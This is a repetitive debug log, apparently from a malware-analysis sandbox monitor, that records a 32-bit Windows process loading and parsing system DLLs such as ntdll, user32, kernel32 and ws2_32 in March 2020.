2020-03-24 10:13:36,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:36,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,428 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,428 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,428 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,428 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,428 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:36,428 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:36,428 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:36,444 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:36,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:36,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:36,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:36,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:36,460 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:36,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:36,460 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:36,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:36,460 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:36,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:36,476 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:36,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:36,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,553 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,553 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,553 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,553 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,553 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,553 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,647 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,849 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:36,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:36,849 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:36,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:36,865 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:36,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:36,865 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:36,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:36,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,865 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:36,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
